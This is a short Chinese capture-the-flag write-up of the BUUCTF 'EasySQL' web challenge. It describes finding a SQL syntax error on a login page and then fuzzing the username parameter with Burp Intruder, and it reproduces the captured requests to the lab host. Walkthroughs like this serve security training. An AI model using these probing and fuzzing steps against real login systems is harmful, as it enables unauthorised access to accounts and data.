BUUCTF-Web-[极客大挑战 2019]EasySQL1
打开题目环境,界面如下:
是个登录界面,结合题目知道应该是sql注入方面的漏洞。
输入1和1,提示:
NO,Wrong username password!!!
输入1‘和1,提示:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1'' at line 1
出此报错,试试万能密码,试了几个没试出来,只能借助Burp批量测试了。
抓包如下:
GET /check.php?username=admin&password=123456 HTTP/1.1Host: fed3def8-2fc2-4b49-bc52-5a1efa2888bd.node3.buuoj.cnUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://fed3def8-2fc2-4b49-bc52-5a1efa2888bd.node3.buuoj.cn/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
选择字典,设置payload
GET /check.php?username=§admin§&password=123456 HTTP/1.1Host: fed3def8-2fc2-4b49-bc52-5a1efa2888bd.node3.buuoj.cnUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://fed3def8-2fc2-4b49-bc52-5a1efa2888bd.node3.buuoj.cn/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
Attack开始跑,不一会结果就出来了。
![BUUCTF-Web-[极客大挑战 2019]EasySQL1 - 图3](/uploads/projects/bug132294@lmmitx/9803a36642afa44c1a4f5747ba13a5ff.png)
![BUUCTF-Web-[极客大挑战 2019]EasySQL1 - 图1](/uploads/projects/bug132294@lmmitx/6213b871a7e66096896699db7de0e6d4.png)
